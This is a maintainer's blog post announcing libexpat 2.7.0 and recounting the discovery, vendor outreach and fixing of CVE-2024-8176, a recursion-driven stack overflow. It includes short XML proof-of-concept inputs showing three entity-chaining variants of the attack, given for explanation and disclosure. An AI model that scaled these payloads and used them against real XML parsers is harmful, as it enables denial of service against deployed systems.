Recursion kills: The story behind CVE-2024-8176 / Expat 2.7.0 released, includes security fixes
For readers new to Expat:
libexpat is a fast streaming XML parser. Alongside libxml2, Expat is one of the most widely used software libre XML parsers written in C, specifically C99. It is cross-platform and licensed under the MIT license.
Expat 2.7.0 has been released earlier today. I will make this a more detailed post than usual because in many ways there is more to tell about this release than the average libexpat release: there is a story this time.
What is in release 2.7.0?
The key motivation for cutting a release now is to get the fix to
a long-standing vulnerability out to users: I will get to that vulnerability
— CVE-2024-8176
— in detail in a moment. First, what else is in this release?
There are also fixes to the two official build systems as usual, as well as improvements to the documentation.
There is a new fuzzer xml_lpm_fuzzer
by Mark Brand
that OSS-Fuzz has already started to include with their daily
continuous fuzzing;
the fuzzer is based on
Clang's libFuzzer and
Google's libprotobuf-mutator (LPM) that
applies a variant of
coverage-guided fuzzing called
structured fuzzing.
A side job of integrating that new fuzzer was making dependency libprotobuf-mutator support
the versions of Protobuf that are shipped by Ubuntu 24.04, 22.04 and 20.04:
my related work upstream
is available to everyone.
Another interesting sideshow of this release is the (harmless) TOCTTOU issue that was uncovered by static analysis in a benchmarking helper tool shipped next to core libexpat. If you have not heard of that class of race condition vulnerability but are curious, the related pull request could be of interest: it is textbook TOCTTOU in a real-world example.
One other thing that is new in this release is that Windows binaries are now built by GitHub Actions rather than AppVeyor and not just 32bit but also 64bit. I have added 64bit binaries post-release to the previous release Expat 2.6.4 already on January 21st, but only now it is becoming a regular part of the release process.
The vulnerability report
So what is that long-standing vulnerability about? In July 2022 — roughly two and a half years ago — Jann Horn of Google Project Zero and Spectre/Meltdown fame reached out to me via e-mail with a finding in libexpat, including an idea for a fix.
What he found can be thought of as "the linear version of billion laughs" — a linear chain (of so-called general entities) rather than a tree — like this:
<!DOCTYPE doc [ <!ENTITY g0 ''> <!ENTITY g1 '&g0;'> <!ENTITY g2 '&g1;'> ]> <doc>&g2;</doc>
Except not with two (or three) levels, but thousands. Why would a chain of thousands of entity references be a problem to libexpat? Because of recursion, because of recursive C function calls: each call to a function increases the stack, and if functions are calling each other recursively, and attacker-controlled input can influence the number of recursive calls, then with the right input, attackers can force the stack to overflow into the heap: stack overflow, segmentation fault, denial of service. It depends on the stack size of the target machine how many levels of nesting it takes for this to hit: 23,000 levels of nesting would be enough to hit on one machine, but not another.
The education that introduces or leads people towards recursion should come with a warning; recursion is not just beautiful, a thinking tool and allowing for often simpler solutions — it also has a dark side to it: a big inherent security problem. The article The Power of 10: Rules for Developing Safety-Critical Code warned about the use of recursion in 2006, but Expat development already started in 1997.
Already in that initial e-mail, Jann shared what he considered the fix — avoiding (or resolving) recursion — and there was a proof-of-concept patch attached of how that could be done in general. Unlike other Project Zero findings, there would be no 90-days-deadline for this issue, because — while stack clashing was considered and is a theoretical possibility — denial of service was considered to be the realistic impact. It should be noted that this risk assessment comes without any guarantees.
The vulnerability process
Two things became apparent to me:
- It seemed likely that this vulnerability had multiple "faces" or variants, and that the only true fix would indeed be to effectively remove all remaining recursion from Expat. It is not the first time that recursion has been an issue in C software, or even libexpat in particular: Samanta Navarro resolved vulnerable recursion in a different place in libexpat code in February 2022 already. Thanks again!
- That it would be a pile of work, not a good match to my unpaid voluntary role in Expat as an addition to my unrelated-to-Expat day job, and not without risk without a partner at detail level on the topic. My prior work on fixing billion laughs for Expat 2.4.0 made me expect this to be similar, but bigger.
And with that expectation, the issue started aging without a fix, and in some sense, I felt paralyzed about the topic and kept procrastinating about it for a long time. Every now and the topic came up with my friend, journalist and security researcher Hanno Böck whom I had shared the issue with. He was arguing that even without a fix, the issue should be made public at some point.
One reason why I was objecting to publication without a fix was that it was clear that in lack of a cheap clean fix, vendors and distributions would start applying quick hacks that would produce false positives (i.e. rejecting well-formed benign XML misclassified as an attack), leave half of the issue unfixed, and leave the ecosystem with a potentially heterogeneous state of downstream patches where — say — in openSUSE a file would be rejected but in Debian it would parse fine — or the other way around: a great mess.
I eventually concluded that the vulnerability could not keep sitting in my inbox unfixed for another year, that it needed a fix before publication to not cause a mess, and that I had to take action.
Reaching out to companies for help
In early 2024, I started considering ways of finding help more, and added a call for help banner to the change log that was included with Expat 2.6.2. I started drafting an e-mail that I would send out to companies known to use libexpat in hardware. I had started maintaining a (by no means complete) public list of companies using Expat in hardware that now came in handy.
On April 14th, 2024 I started finding looking for security
contacts for companies on that list.
For some, it was easy to find and for others, I gave up eventually;
for some, I am still not sure whether I got the right address
or whether they are ghosting me as part of an ostrich policy.
I wish more companies would start serving /.well-known/security.txt
;
finding vulnerability report contacts is still actual work in 2025 and should not be.
So then I mailed to circa 40 companies using a template, like this:
Hello ${company}, this e-mail is about ${company} product IT security. Are you the right contact for that? If not please forward it to the responsible contact within ${company} — thank you! On the security matter: It has come to my attention that ${company} products and business rely on libexpat or the "Expat" XML parser library, e.g. product ${product} is using libexpat according to document [1]. I am contacting you as the maintainer of libexpat and its most active contributor for the last 8 years, as can be seen at [2]; I am reaching out to you today to raise awareness that: - All but the latest release of libexpat (2.6.2) have security issues known to the public, so every product using older versions of libexpat can be attacked through vulnerable versions of libexpat. - Both automated fuzzing [3] and reports from security researchers keep uncovering vulnerabilities in libexpat, so it needs a process of updating the copy of libexpat that you bundle and ship with your products, if not already present. - My time on libexpat is unfunded and limited, and there is no one but me to constantly work on libexpat security and to also progress on bigger lower priority tasks in libexpat. - There is a non-public complex-to-fix security issue in libexpat that I have not been able to fix alone in my spare time for months now, that some attackers may have managed to find themselves and be actively exploiting today. I need partners in fixing that vulnerability. Can ${company} be a partner in fixing that vulnerability, so that your products using libexpat will be secure to use in the future? I am looking forward to your reply, best Sebastian Pipping Maintainer of libexpat [1] ${product_open_source_copyright_pdf_url} [2] https://github.com/libexpat/libexpat/graphs/contributors [3] https://en.wikipedia.org/wiki/Fuzzing
Replies are coming in
The responses I got from companies were all over the map:
-
My "favorite" reply was "We cannot understand what you want from us" when everyone else had understood me just fine. Nice!
-
Though that competes with the reply "A patch will be released after the fall." when they had not received any details from me. Okay!
-
There was arguing that the example product that I had mentioned was no longer receiving updates (rather than addressing their affected other products that are not end-of-life and continue to use libexpat).
-
I was asked to prove a concrete attack on the company's products (which would not scale, need access to the actual product, etc).
-
That they "do not have sufficient resources to assist you on this matter even if libexpat is employed in some of .....'s products" came back a few times.
It was interesting and fun in some sense, and not fun in another.
Next stop: confidentiality
What came next was that I asked companies to sign a simple freeform
NDA with me.
Companies were not prepared for that. Why was I asking for an NDA and
TLP:RED
?
To (1) make sure that who got the details would need to collaborate
on a true fix and not just monkey-patch their own setups and (2)
to avoid the scenario of heterogeneous trouble fixes
that I mentioned before
that would have been likely in case of a leak before there was a true fix.
Some discussions failed at NDA stage already, while others survived and continued to video calls with me explaining Jann's findings in detail.
It is worth noting that I knew going in that many vulnerability reward programs exclude the whole class of denial of service and so I tied sharing the expected impact to signing an NDA to reduce the chances of everyone discarding it "Oh 'just' denial of service, we'll pass".
The eventual team and security work
Simplifying a bit, I found two main partner companies in this: Siemens and a company that would not like to be named, let's call them "Unnamed Company". Siemens started development towards a candidate fix, and Unnamed Company started evaluating options of what other companies they could pay to help for them, which got Linutronix and also Red Hat involved.
Siemens took the builder role while Linutronix, Red Hat and I provided quality assurance of various kinds. While we did not work day and night, it is fair to say that we have been working on the issue since May 2024 — for about 10 months.
The three faces of the vulnerability
It did indeed turn out that the vulnerability has multiple — three — faces:
1. General entities in character data
<!DOCTYPE doc [ <!ENTITY g0 ''> <!ENTITY g1 '&g0;'> <!ENTITY g2 '&g1;'> ]> <doc>&g2;</doc>
2. General entities in attribute values
<!DOCTYPE doc [ <!ENTITY g0 ''> <!ENTITY g1 '&g0;'> <!ENTITY g2 '&g1;'> ]> <doc key='&g2;'/>
3. Parameter entities
<!DOCTYPE doc [ <!ENTITY % p0 ''> <!ENTITY % p1 '%p0;'> <!ENTITY % p2 '%p1;'> <!ENTITY % define_g0 "<!ENTITY g0 '%p2;'>"> %define_g0; ]> <doc/>
The third variant "Parameter entities" reuses ideas from my 2013 exploit for vulnerability Parameter Laughs (CVE-2021-3541): It used the same mechanism of delayed interpretation.
Conclusions and gratitude
It is no overstatement to say that without Berkay Eren Ürün — the main author of the fix — and his manager Dr. Thomas Pröll at Siemens there would be no fix today: a big and personal "thank you!" from me.
Thanks to Unnamed Company, to Linutronix, to Red Hat for your help making this plane fly!
Thanks to Jann Horn for his whitehat research and the demo patch that lead the path to a fix!
Thanks to everyone who contributed to this release of Expat!
And please tell your friends:
Please leave recursion to math and keep it out of (in particular C) software: it kills and will kill again.
Kind regards from libexpat, see CVE-2022-25313 and CVE-2024-8176 for proof.
For more details about this release, please check out the change log.
If you maintain Expat packaging or a bundled copy of Expat or a pinned version of Expat somewhere, please update to 2.7.0. Thank you!
Sebastian Pipping